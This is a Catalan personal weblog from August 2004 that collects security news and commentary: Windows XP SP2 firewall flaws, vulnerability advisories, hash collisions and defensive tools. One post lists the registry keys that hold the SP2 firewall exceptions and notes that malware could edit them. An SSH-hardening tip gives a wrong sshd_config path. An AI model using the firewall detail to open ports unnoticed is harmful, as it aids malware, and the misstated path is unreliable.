|
Weblog d'en Xavi Caballé
 |
dimarts, 31 / agost / 2004 |
Nova versió de la guia de Microsoft de seguretat de Windows XP sobre com enfortir la seguretat dels equips amb Windows XP en tres situacins diferents: dins d'una xarxa Windows (on es fa servir l'Active Directory), en entorns on calgui aplicar un elevat nivell de seguretat i en equips independents.
|
07:19 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Via Slashdot] Entrevista a Wired del responsable de programes de seguretat a Microsoft: Microsoft's War on Bugs on, a la pregunta de si hi ha possibilitats de millorar el nivel lde seguretat ens diu que n'hi ha per temps:
We're two and a half years down a much longer road; it's more of a 10-year timeline.
És a dir, que continuarem amb un sistema operatiu amb debilitats de seguretat al seu disseny durant força anys.
|
06:51 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] Switching to Linux picks up steam
About a third of businesses plan to migrate at least some Windows machines to Linux, according to a recent survey, but adoption will continue to be both slow and cautious, as companies evaluate a maze of economic factors.
|
06:42 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[InformationWeek] The Privacy Lawyer: It's Time To Build A Data Map. Les organitzacions han de conèixer el fluxe de la informació com a pas bàsic per a aplicar mesures de protecció de la informació. Un «data map» és el resultat d'un estudi detallat sobre com s'obtenen i fan servir les dades dins de l'organització
|
06:40 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Weplab és una utilitat que permet verificar la seguretat del xifrat WEP d'una connexió sense fis. Permet realitzar diversos tipus d'atac, de forma que podem avaluar quin és el grau de resistència que ofereix la nostra xarxa i, alhora, il·lustra les deficiències de WEP. Funciona en Linux i Windows (Cygwin).
|
06:20 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 30 / agost / 2004 |
 El proper diumenge, 5 de setembre, s'emetrà l'última edició de «Bits de Nit», el que ha estat el programa d'Internet durant aquest estiu a Catalunya Ràdio.
Es tracta d'un programa a l'estil de «La nit dels ignorants» però centrat únicament en Internet. Els oidors participaven realitzant preguntes sobre on trobar determinada mena d'informació a Internet, per tal que altres oidors li donessin la resposta. Els canals de participació són el telèfon, el correu electrònic i un canal de xat a la web de Catalunya Ràdio.
Durant aquests programes l'he estat escoltant i he participat al xat (amb el pseudònim d'os2man)... ha estat una experiència divertida i crec que el programa ha estat prou interessant, amb una bona participació i amb gairebé totes les preguntes amb la seva corresponent resposta.
|
07:25 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
El projecte de classificació d'amenaces a la seguretat de la web té com a finalitat aclarir i organitzar les amenaces a la seguretat d'un servidor web. El projecte pretèn crear una terminologia estàndard per tal de descriure aquestes amenaces, per tal que els programadors, professionals de la seguretat, distribuïdors de productes de seguretat i auditors facin servir els mateixos termes alhora de referir-se a una situació en concret.
|
07:12 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[SecurityFocus] FBI busts alleged DDoS Mafia. Un dels primers casos demostrats on una empresa ha pagat a atacants per tal de realitzar un atac distribuït de denegació de servei contra la seva competència:
A Massachusetts businessman allegedly paid members of the computer underground to launch organized, crippling distributed denial of service (DDoS) attacks against three of his competitors, in what federal officials are calling the first criminal case to arise from a DDoS-for-hire scheme.
|
06:51 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Flexbeta] How secure is Windows Firewall? Anàlisi de la capacitat del tallafocs inclòs al Service Pack 2 de Windows XP per tal de detectar atacs i comprovacions de ports. La conclusió: millor desactivar-lo i fer servir un altre.
According to the test results Windows Firewall does a good job at blocking incoming traffic. However, the fact that it does not monitor outgoing traffic and that it can be turned off easily by other applications really doesn’t make it a safe firewall in my opinion. The resolution, turn it off and get another firewall such as ZoneAlarm or better yet, Sygate Personal Firewall which is free for personal use and offers exceptional protection; both incoming and outgoing.
|
06:48 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Via Slashdot], un article de la CNN sobre el 35è aniversari d'Internet on s'explica el passat de la xarxa i les tendències de futur. Segons aquest article, la data de l'aniversari serà el proper 2 de setembre.
|
06:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] Digital attacks on Winamp use 'skins' for camouflage. Hi ha una vulnerabilitat a WinAmp que està sent utilitzada pels autors d'Spyware per tal d'infectar els ordinadors dels usuaris. La vulnerabilitat es troba en la gestió dels skins (fitxers que canvien l'aspecte del programa).
El problema afecta a les versions anteriors a la 5.04 i hi ha disponible una prova de concepte.
|
06:28 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Acaba de publicar-se la versió 1.1.7 de rootkit hunter, un conjunt d'eines que permeten determinar l'existència de rootkits, portes secretes i exploits dins d'una màquina Linux. La determinació es fa a través de la comparació del hash MD5 dels fitxers, la identificació de fitxers sospitosos, els canvis en els permisos dels fitxers, la presència de determinades cadenes de text i, opcionalment, la cerca de text dins els fiters binaris.
|
06:19 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 29 / agost / 2004 |
the mobile phone directory, impressionat web on es recull tota mena d'informació sobre els telèfons mòbils: glossari de termes, documentació sobre la tecnologia de comunicacions mòbils (de primera, segona i tercera generació... i l'apartat de quarta generació en preparació), informació específica dels telèfons mòbils que estan disponibles a Europa i el Regne Unit i un apartat de notícies.
|
23:49 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Avís de seguretat de Cisco: Vulnerabilitat de denegació de Servei a Telnet
A specifically crafted Transmission Control Protocol (TCP) connection to a telnet or reverse telnet port of a Cisco device running Internetwork Operating System (IOS)® may block further telnet, reverse telnet, Remote Shell (RSH), Secure Shell (SSH), and in some cases Hypertext Transport Protocol (HTTP) access to the Cisco device
|
17:04 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Microsoft] Troubleshooting Windows Firewall in Microsoft Windows XP Service Pack 2, com treballar en solucionar els possibles problemes de connexió en màquines Windows XP amb el Service Pack 2 instal·lat. L'article explica com funciona el tallafocs de Windows XP, les eines disponibles per detectar l'origen del problema i com treballar en solucionar-los. L'article està pensat per administradors i usuaris avançats amb coneixements de Windows XP.
|
13:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Via Kriptópolis] ChipEspia.com, una web en castellà dedicada a analitzar les implicacions i perills de les tecnologies d'identificació per ràdiofreqüència (RFID).
|
13:34 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 28 / agost / 2004 |
[Full-Disclosure] Malware can silently open holes in SP2 Firewall. Malgrat el que s'havia dit anteriorment sobre que la manipulació del tallafocs inclòs al Service Pack 2 de Windows XP només es podria fer via API, al registre de Windows es troba la informació de les excepcions a nivell d'aplicacions i ports:
Application Exceptions:
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ SharedAccess \ Parameters \ FirewallPolicy \ StandardProfile \ AuthorizedApplications \ List
Port Exceptions:
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ SharedAccess \ Parameters\ FirewallPolicy \ StandardProfile \ GloballyOpenPorts \ List
Això vol dir que qualsevol malware pot modificar aquestes entrades per tal d'afegir-s'hi ell mateix.
Per tant, podem dir que el Service Pack 2 de Windows XP dóna una falsa sensació de seguretat a l'usuari.
|
22:57 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
La versió actual de l'Internet Explorer, per tal d'ajustar-se als estàndards, limita el nombre de connexions simultànies a un servidor HTTP v1.1 a dues per a descarrega de fitxers més una addicional que fa les funcions de cua. Aquesta configuració depèn en exclusiva del navegador.
A mesura que la velocitat d'accés a la xarxa va augmentant, la limitació de dues connexions amb un servidor, es converteix en massa restrictiva. L'usuari pot canviar això, però cal tenir ben present que és una violació dels estàndards d'Internet:
- Executar l'editor del registre (regedit.exe)
- Anar a HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings
- Seleccionar al menú d'edició l'opció New -> DWORD
- Donar a la nova entrada el nom MaxConnectionsPer1_0Server
- Fer clic amb el botó dret del ratolí damunt de MaxConnectionsPer1_0Server i escollir l'opció de Modificar.
- A l'apartat de Base, indicar que el valor l'introduïm com un número decimal.
- Al valor, indicar el nombre de connexions simultànies que volem configurar. Per exemple, podem indicar 6. Tancar la finestra.
- Repetir els passos 3 a 7 utilitzant com a nom de valor MaxConnectionsPerServer.
- Sortir de l'editor del registre
He estat mirant com es podria fer això mateix a Mozilla, però no ho he trobat. Alguna pista?
|
22:46 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Slashdot] Longhorn to be Released in 2006, sans WinFS. Microsoft afirma que vol oferir la nova versió de Windows (a nivell d'escriptori) durant l'any 2006. Per aconseguir aquesta data, admet que un dels seus components bàsics, WinFS (el nou sistema de fitxers) no estarà disponible.
Microsoft acostuma a anunciar dates de publicació que mai no compleix, així que segurament no veurem Longhorn fins al 2007.
|
19:07 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Al març comentava la publicació d'una eina de Microsoft, Port Reporter, que facilitava la monitorització de les connexions TCP/IP a una màquina Windows (2000, XP i 2003).
Port Reporter funciona com un servei del sistema i registra l'activitat de comunicacions TCP/IP (protocols TCP i UDP) del sistema: data, hora, protocol, port d'origen, adreça IP d'origen, port de destinació, adreça IP de destinació, identificador de procés, mòdul (aplicació) i contexte de seguretat (usuari).
Ara, hi ha disponible PR-Parser que és una utilitat gràfica per a l'anàlisi dels registre d'activitat generats per Port Reporter. També hi ha un article de la Knowledge Base de Microsoft i un webcast sobre aquesta mateixa eina.
Port Reporter és una eina especialment valuosa en l'anàlisi d'activitat sospitosa.
|
18:04 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
El CERT/CC i el Servei Secret dels Estats Units publiquen un estudi on s'analitzen els atacs informàtics realitzats des de dins les empreses del sector bancari i financer.
Continuació... - També a Hispasec.com
|
15:20 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 27 / agost / 2004 |
 Us imagineu com podria ser una versió en modalitat text del cercador d'imatges de Google. La resposta, Toogle.
|
20:33 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Neal Stephenson no és pas un autor de la meva predilecció. Recordo haver-ho passat molt malament tractant de llegir el Cryptonomicon (fins al punt d'haver d'abandonar el llibre a la meitat del segon volum, senzillament cansat de passar pàgines i pàgines totalment perdut). Però en veure fa poc una referència a aquest llibre al weblog de Vicent Partal em va despertar la curiositat. Així que vaig baixar-me el PDF de la versió en castellà) i aquests dos últims dies l'he estat llegint.
A diferència del Cryptonomicon, aquesta és una mena de columna d'opinió on es fa una mena de defensa diguem poc convençuda del software lliure, guarnida amb un intent constant de cercar les frases polèmiques que serveixin com titular o com la genialitat recargolada d'algú que es pensa dotat d'una capacitat innata per dir frases genials. Algú com el Jordi Basté, però no tan penós.
Stephenson presenta per un costat la cultura comercial que va aconseguir fer-se d'or venent una colla de bits reunits (segons ell, no venien res... tampoc no cal exagerar tant) i les raons per les quals els venedors de sistemes operatius no tenen cap interès en fer les coses bé, sinó més aviat tot el contrari: l'objectiu dels venedors de sistemes operatius es vendre productes dolents i carregats.
Una cosa que si m'ha sorprès es que gosa (i segurament per això ha rebut més d'una patacada) de col·locar a Apple i Microsoft com dos representats d'una mateixa visió. En això coincideixo amb ell: Apple i Microsoft son bàsicament la mateixa cosa i no hi ha cap diferència fonamental entre les dues empreses. La diferència de percepció que tenim no deixa de ser el resultat de les campanyes de màrketing de l'una i l'altra. Veiem Apple com una empresa mística gràcies als milions i milions de dòlars que s'ha gastat en publicitat per tenir una imatge de marca.
També he trobat curiosa la visió revolucionària que dóna Stephenson al BeOS. Jo el vaig arribar a provar i no vaig veure res d'excepcional. Era un sistema operatiu acceptable, però no notable. Tenia coses bones, però no destacava especialment per res, raó per la qual poc a poc es va anar diluint.
Em sorprèn especialment la visió gairebé màgica que li dóna Stephenson a la integració entre la interfície gràfica i la interfície de línia d'ordres a BeOS... quan aquesta no era funcionalment massa diferent a la que aleshores es trobava a d'altres sistemes operatius (com per exemple, Windows NT o l'OS/2 que ja estaven disponibles per aquelles dates). Al BeOS l'intèrpret d'ordres no era una altra cosa que una aplicació que s'aprofitava d'una API per a l'execució d'aplicacions no gràfiques. No gaire diferent al CMD.EXE de Windows NT o de l'OS/2.
En definitiva, el llibre és una mena de lliçó de màrketing de software d'algú que no està convençut del que està venent i no acaba de trobar algun argument sòlid. I com no el troba, escull una opció i es dedica a inflar els detalls que li interessen encara que sigui explicant mitges veritats... fa, en definitiva, el mateix que Microsoft quan compara Windows amb Linux.
Per últim, per no desmerèixer l'intent de l'autor citaré dues de les frases polèmiques: «Al tratar de comprender el fenómeno Linux, pues, tenemos que contemplar no a un único innovador, sino una especie de extraña Trinidad: Linus Torvalds, Richard Stallman y Bill Gates. Elimínise cualquiera de estos tres y Linux no existiría» i «Tanto Windows 95 como MacOS son productos diseñados por ingenieros al servicio de compañías específicas. Unix, en cambio, no es tanto un producto como una historia oral escrupulosamente compilada de la subcultura hacker». Com deia abans, semblen els comentaris predibles d'un partit de futbol que sempre fa el Jordi Basté.
---
(*) Com segurament més d'un haurà notat, la traducció al castellà del títol incorpora un autèntic barbarisme... en castellà, un comando és un grup armat terrorista i no pas una ordre pel sistema operatiu; per tant el títol hauria de dir la línea de órdenes... però bé, he respectat el nom original, encara que sigui erroni).
|
18:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Dos prestigiosos columnistes parlen sobre les seves impressions del Service Pack 2 de Windows XP: Dan Gillmor (Windows update makes data safer, but not safe) i Walt Mossberg (Protecting Your PC With Windows XP SP2).
El primer dels columnistes encara no l'ha instal·lat doncs prefereix esperar uns quants dies més. El segon en canvi ja el té instal·lat a un parell d'ordinadors.
Els dos coincideixen que el Service Pack 2 no fa prou per millorar la seguretat. Segons ells Microsoft hauria de fer molt més per millorar el nivell de seguretat de Windows, ja que si bé es cert que amb aquesta actualització el malware ho tindrà més difícil, no s'incorpora cap mesura de protecció per protegir-nos dels virus, l'spyware o el correu brossa.
La conclusió es prou clara:
Overall, SP2 is worth installing and will definitely improve Windows security. But it's limited. You'll still need to look beyond Microsoft to really secure your Windows PC.
|
17:47 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Avui passejant he trobat uns portàtils que incorporen una tecnologia que sembla molt interessant. S'anomena PuRAM i consisteix en un disc Flash (memòria no volàtil) per al sistema operatiu. Aquesta memòria ofereix un alt rendiment (6,4 GB/s, unes cent vegades més ràpid que qualsevol disc dur), pensada per emmagatzemar el sistema operatiu.
Això ofereix tres avantatges fonamentals ben importants: el temps d'iniciar la màquina és pràcticament instantani. El segon avantatge és que no cal preocupar-se per desfragmentar el disc. I el tercer gran avantatge es que la memòria virtual no alenteix la màquina, ja que l'accés es gairebé tan ràpid com la pròpia memòria de l'ordinador.
Ara només falta esperar que això es popularitzi i arribi amb un preu raonable. Actualment és una tecnologia totalment prohibitiva (uns 5.000 dòlars).
|
14:22 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Identificades diverses vulnerabilitats de seguretat a la versió per a Solaris del servidor web Apache. Es tracta de problemes explotables de forma local o remota i que poden ser utilitzats per a provocar atacs de denegació de servei, saltar-se les restriccions de seguretat i comprometre els sistemes vulnerables.
Continuació... - També a Hispasec.com
|
12:33 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Torno a tenir invitacions per a GMail (aquesta vegada únicament cinc disposo d'onze invitacions). Si hi ha algú amb interès, envieu-me un missatge  .
|
12:22 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Via Microsiervos] Possiblement les primeres fotografies reals del Treo 650.
Alguns dels detalls que es poden apreciar: la bateria es pot treure, un petit mirallet al costat de la càmera per a fer-nos autoretrats, una protecció per a la lent de la càmara de fotos, la presència de la icona de Bluetooth i un altaveu més gran.
|
11:45 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dijous, 26 / agost / 2004 |
[Secunia] Sun Solaris Multiple Apache Vulnerabilities. Es tracta de vulnerabilitats crítiques, que afecten a Solaris 8 i 9 i poden ser utilitzades per atacs de denegació de servei, saltar-se les mesures de seguretat o fins i tot arribar a comprometre sistemes vulnerables. Les vulnerabilitats poden ser aprofitades per un atacant local o remot. Sun ha publicat un avís i els pegats per a corregir els problemes: T113146-05.tar.Z (Solaris 9 SPARC) i T114145-04.tar.Z (Solaris 9 x86).
|
21:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[La Vanguardia] Curvas binarias
Quienes sospechan que las modelos de Playboy no pueden ser reales no tendrán duda alguna al respecto en el próximo número de la revista, en el que las chicas virtuales de los videojuegos exhiben sus más íntimos códigos binarios.
|
21:17 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[The Register] Windows XP SP2 features security crater - report
Windows XP Service Pack 2 has a flaw that gives users a false sense of security - quite literally. One report describes the security hole as a 'crater'. The vulnerability lies in the web systems management interface (WBEM), which allows downloadable code to spoof firewall status information.
|
07:32 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[LinuxJournal] Building a Diskless 2.6 Firewall. Guia pas a pas per a la construcció d'un tallafocs i encaminador per a una xarxa domèstica amb Linux 2.6, utilitzant hardware que es pot aconseguir a un preu ben baix. La guia mostra com configurar el tallafocs en un equip sense unitats de disc, utilitzant una memòria CompactFlash.
|
07:26 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 El Servei Secret dels Estats Units i el CERT han publicat un informe, Insider Threat Security, on s'analitzen les activitats il·legals que afecten als sistemes d'informació orignats des de dins de les organitzacions. Està basat en:
«23 incidents realitzats per 26 empleats del sector bancari i financer entre el 1996 i el 2002. Les organitzacions afectades per aquests atacs inclouen empreses de prèstecs, bancs, firmes d'inversió i d'altres empreses les activitats de les quals s'inscriuen en aquest sector.
Dels 23 incidents, 15 van suposar frau, 4 estaven relacionats amb el robatori de propietat intel·lectual i 4 més consistien en el sabotatge de sistemes informàtics o la xarxa».
Algunes de les conclusions:
«- Most of the incidents in the banking and finance sector were not technically sophisticated or complex. They typically involved the exploitation of non-technical vulnerabilities such as business rules or organization policies (rather than vulnerabilities in an information system or network) by individuals who had little or no technical expertise. In 87% of the cases the insiders employed simple, legitimate user commands to carry out the incidents, and in 78% of the incidents, the insiders were authorized users with active computer accounts.
- The majority of the incidents (81%) were devised and planned in advance. Furthermore, in most cases, others had knowledge of the insider's intentions, plans, and/or activities. Those who knew were often directly involved in the planning or stood to benefit from the activity.
- Most insiders (81%) were motivated by financial gain, rather than a desire to harm the company or information system.
- Insiders in this report fit no common profile. Only 23% held a technical position, 13% had a demonstrated interest in hacking and 27% had come to the attention of a supervisor or co-worker prior to the incident.
- Insider incidents were detected by internal, as well as external, individuals including customers.
The impact of nearly all insider incidents in the banking and finance sector was financial loss for the victim organization: in 30% of the cases the financial loss exceeded $500,000. Many victim organizations incurred harm to multiple aspects of the organization.
- Most of the incidents (83%) were executed physically from within the insider's organization and took place during normal business hours»
|
06:38 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Astaro Security Linux és un sistema de seguretat perifèrica basat en Linux. Oferix les funcions de tallafocs, protecció davant intrusions, detecció de correu brossa, passarel·la de xarxes privades virtuals i filtrat d'URL. Costa 400 dòlars, però ofereix una versió gratuïta per ús personal.
|
06:21 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimecres, 25 / agost / 2004 |
[Diari de Barcelona] Microsoft explica alguns dels errors més políticament incorrectes
La setmana passada, a Glasgow, un dels executius de Microsoft va fer públiques una altra mena d'errades que han arribat a ofendre països sencers, governs i comunitats humanes, i que han obligat la companyia a retirar alguns productes. Vuit píxels mal pintats o una paraula mal traduïda poden ser l'orígen d'una catàstrofe de milions de dòlars.
(...)
Un dels casos més sonats es va donar a Llatinoamèrica, per la mala traducció a l'espanyol d'una versió del sistema operatiu Windows XP destinada a aquells mercats. En un moment de la configuració, es preguntava als usuaris que especifiquessin el seu gènere i se'ls deixava triar entre "no especificat", "masculí" o "prostituta".
|
20:59 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[eWeek] Concerns Mount over Major Web Strike
A coordinated online strike against Internet servers by terrorists, dubbed "electronic jihad," may or may not strike this week, security experts said. One security researcher in Moscow warned that Thursday would be the day in question.
But a recent string of attacks on primary Internet services and the unraveling of major encryption routines are raising concerns in the Internet operator community.
|
20:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[UnixWiz] An Illustrated Guide to Cryptographic Hashes, un document de lectura obligada per conèixer l'abast real de la recentment anunciada debibilitat en alguns algoritmes de xifrat (MD4, MD5 i SHA-O).
With the recent news of weaknesses in some common security algorithms (MD4, MD5, SHA-0), many are wondering exactly what these things are: They form the underpinning of much of our electronic infrastructure, and in this Guide we'll try to give an overview of what they are and how to understand them in the context of the recent developments.
(...)
Some very bright researchers in China presented a paper, Collisions for Hash Functions MD4, MD5, HAVAL-128 and RIPEMD, at the Crypto 2004 conference in August 2004, and it's shaken up the security world considerably. This was some outstanding cryptography research.
They have found ways to reliably generate collisions in four hash functions much faster than brute-force time, and in one case (MD4, which is admittedly obsolete), with a hand calculation. This has been a stunning development.
(...)
In the short term, this will have only a limited impact on computer security. The bad guys can't suddenly start tampering with software that can fool published checksums, and they can't suddenly start cracking hashed passwords.
|
18:40 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[SecurityFocus] Using Libwhisker. Aquesta article tracta sobre la utilització de Libwhisker, un mòdul per a PERL que permet la creació de paquest HTTP especialment formatejats. Això pot ser molt útil per a realitzar proves de penetració contra aplicacions web.
|
07:00 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[ITConversations] Paul Graham parla sobre els grans hackers.
We caught this gem by accident while testing our audio link to the O'Reilly Open Source Convention (2004).
Està disponible en format MP3, així com la seva transcripció.
|
06:57 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 dd_rescue és una eina per a copiar dades des d'un fitxer o un dispositiu de blocs (com pot ser un disc dur o un CD, per exemple) a un altre, amb la particularitat que tracta de recuperar les dades en cas de detectar un error de lectura. A diferència del dd original, no talla el fitxer de sortida, excepte si li indiquem que ho faci.
D'aquesta forma, cada vegada que l'executem contra un mateix fitxer de sortida tracta d'omplir les forats. L'algortime de dd_rescue llegeix la part que no està feta malbé. A continuació llegeix les parts danyades, dividint-les en àrees de menor mida i tractar de recuperar la informació. Repeteix aquesta operació fins arribar a la mida del bloc de hardware, arribar al límit d'intents indicats o l'usuari interrompi l'operació.
|
06:52 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 24 / agost / 2004 |
[CNet] Stopping spam at the source parla sobre les noves tecnologies que està avaluant la IETF (Internet Engineering Task Force) per tallar el problema del correu brossa de soca-rel.
|
07:25 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Barrapunto] Microsoft publica Windows XP Starter Edition, sobre la disponibilitat d'una versió especial de Windows XP pensada pels països en vies de desenvolupament... és molt més barata, però té unes limitacions que són d'autèntic escàndol: Windows XP Starter Edition únicament permet tres aplicacions de forma simultània, resolució de pantalla 800x600, no permet la compartició de recursos per la xarxa.
Si es vol ajudar a que països en vies de desenvolupament progressin, els hi hem de donar exactament les mateixes oportunitats que tenim nosaltres... no pas productes «capats».
De fet la intenció oculta d'aquest producte és, clarament, impedir que els fabricants considerin la utilització de Linux en aquests països, oferint una versió de Windows de molt baix cost. D'aquesta forma se'ls convida a no invertir en la integració d'un altra sistema operatiu, sinó continuar amb un entorn «ja conegut».
|
06:58 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[NetworkWorldFusion] Taking aim at spyware
Spyware, as the plethora of adware, keyloggers, and trojans is often called these days, is starting to get the kind of attention from business IT departments that was once reserved for the traditional mess of computer viruses and worms.
L'article comenta els problemes que origina l'spyware i que impedeixen un normal funcionament dels equips i quines implicacions té això a nivell de seguretat.
|
06:38 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
A K-Otik han publicat el codi font d'una eina per a realitzar atacs de força bruta contra servidors SSH. És una eina ben simple, però segurament serà força efectiva contra servidors amb una política de contrasenyes feble.
Com a mesures de prevenció i reducció de les possibilitats de ser víctimes d'aquesta mena d'atacs:
- A la configuració del servidor SSH (/etc/mail/sshd_config), restringir els usuaris que no poden connectar de forma remota. Especialment, cal establir l'opció PermitRootLogin a no per impedir la connexió remota de root.
- Aplicar mesures de protecció perifèriques (tallafocs, encaminadors...) per restringir la connectivitat a SSH a les màquines utilitzades per a l'administració.
- Considerar la utilització de mecanismes d'autenticació alternatius, com poden ser els certificats d'usuari i/o màquina, tractant d'evitar la utilització de l'autenticació per usuari/contrasenya.
|
06:30 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Bon dia! Avui és el meu trenta-cinquè aniversari... :-)
|
06:18 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 23 / agost / 2004 |
Avui he fet el primer intent de fotografia panoràmica, unint diverses fotografies (6 en total) per tal de tenir una visió més àmplia. Per ser el primer intent, el resultat no es del tot dolent, encara que si millorable.
La foto correspon a la Plaça Universitat de Barcelona, des de la finestra de l'oficina. La imatge panoràmica resultant ocupa uns 8 MB i la resolució és 8672x2192. La versió que publico aquí a la web l'he reduïda a 2048x532 i només ocupa 694 KB
|
20:52 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Somos51, refresc natural de cola amb guaranà fabricat per una empresa catalana. Una característica digna de destacar es que a la web expliquen quin són els ingredients i la raó d'utilitzar-los. A més, malgrat ser un refresc «de cola», no porta cafeïna (això no se pas si es bo o dolent...) i per donar-hi un toc especial, extracte de guaranà.
Una altra característica digna de menció és la filosofia de l'empresa: el 51% dels beneficis es destinen a accions solidàries amb països en vies de desenvolupament... i els projectes on s'invertirarn poden ser escollits a la pròpia web de l'empresa.
El refresc és difícil de trobar als supermercats, però es pot encarregar a la web... em sembla que m'animaré i faré una comanda per així tastar-lo.
|
15:26 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Infosec Writers] OpenVPN 101: Introduction to VPN. Article pràctic que mostra com fer servir OpenVPN per establir canls segurs entre ordinadors utilitzant el protocol IPSec. Els exemples s'han provat en entornos Linux i Windows (2000 i XP).
|
06:34 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[GlobeAndMail] Life without numbers in a unique Amazon tribe. Els Piraha, una població indígena de l'Amazònia, no fa servir números per a res. Tampoc no semblen tenir paraules per a anomenar els colors, no dormen més de dues hores seguides, el seu sistema habitual de comunicació són els signes, no tenen cap explicació per a l'origen de la vida, no tenen art ni s'expliquen històries... els investigadors els han descrits com «gent vinguda de Mart».
|
00:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Quin quadre més bonic... no el coneixia fins que avui l'he vist a les notícies com conseqüència del robatori a Noruega. El trobo sensacional!
|
00:04 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 22 / agost / 2004 |
LIDS (Linux Intrusion Detection System) és una col·lecció de pegats i eines d'aministració que milloren el nivell de seguretat ofert pel nucli del sistema operatiu Linux, implementant un sistema de control d'accés obligatori. Un cop implementat els accessos a fitxers, memòria, operacions d'entrada/sortida i operacions d'administració poden ser controlades.
Implementat un control d'accés obligatori es pot controlar quins usuaris tenen permisos per realitzar qualsevol operació i es possible limitar-ne l'accés (fins i tot per a l'usuari root). LIDS permet definir quins programes poden accedir als recursos (fitxers, recursos del sistema...), amagar processos, gestionar la recepció d'esdeveniments d'alarmes, etc.
|
23:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Google està aprofitant la celebració dels Jocs Olímpics per mostrar els diferents esports al seu logo... Els podeu veure tots reunits.
|
23:26 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Treo.PDATopSoft.com, directori amb software pel Treo 600 (shareware, freeware i comercial). Els programes estan classificats per categories.
|
22:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[SC Magazine] Crypto world rocked by potential flaws
Reports from the Crypto 2004 conference have demonstrated potential attacks against MD5 and SHA hashing algorithms.
MD5 and SHA-1 are widely used in cryptography to generate one-way hashes of data. SHA-1 is a more secure version of the earlier SHA-0 algorithm.
Antoine Joux, a French cryptography researcher, demonstrated a technique to reduce the complexity of attacking SHA-0 by many orders of magnitude
|
19:08 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[SecurityFocus] Wireless Attacks and Penetration Testing. Sèrie de tres articles (aquest, aquest i aquest) sobre els atacs que pot rebre una xarxa sense fils i quines tècniques de proves de penetració es poden utilitzar per a determinar els possibles punts febles.
|
13:41 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 21 / agost / 2004 |
| Product Information |
| 835935 |
Release notes for Windows XP Service Pack 2 |
| 837783 |
Hard Disk Space Requirements for Windows XP Service Pack 2 |
| 811113 |
List of fixes included in Windows XP Service Pack 2 |
| 838079 |
Windows XP Service Pack 2 Support Tools |
| 838080 |
Windows XP SP2 Deployment Tools |
| 883262 |
The new language locales that Windows XP Service Pack 2 supports |
| 883792 |
Frequently asked questions about Windows Security Center |
| 883353 |
Windows XP Tablet PC Edition 2005 is installed with Windows XP Service Pack 2
|
| Top Support Issues |
| 842242 |
Some programs seem to stop working after you install Windows XP Service Pack 2 |
| 843016 |
How to configure pop-up blocker in Internet Explorer |
| 843017 |
Description of the IE Information Bar |
| 843018 |
Images are blocked when you open an e-mail message in Outlook Express on a Windows XP Service Pack 2-based computer |
| 843090 |
Description of the Windows Firewall feature in Windows XP Service Pack 2 (SP2) |
| 870700 |
How to troubleshoot problems accessing secure Web pages with Internet Explorer 6 Service Pack 2 |
| 870702 |
How to troubleshoot wireless network connections in Windows XP Service Pack 2 |
| 875349 |
How to change your auto update settings using Windows Security Center |
| 875350 |
How to remove Windows XP Service Pack 2 from your computer |
| 875351 |
You receive a "Data Execution Prevention" error message in Windows XP Service Pack 2 |
| 875352 |
Detailed description of the data execution prevention feature in Windows XP SP2 |
| 875356 |
How to configure the Windows Firewall feature in Windows XP Service Pack 2 |
| 875357 |
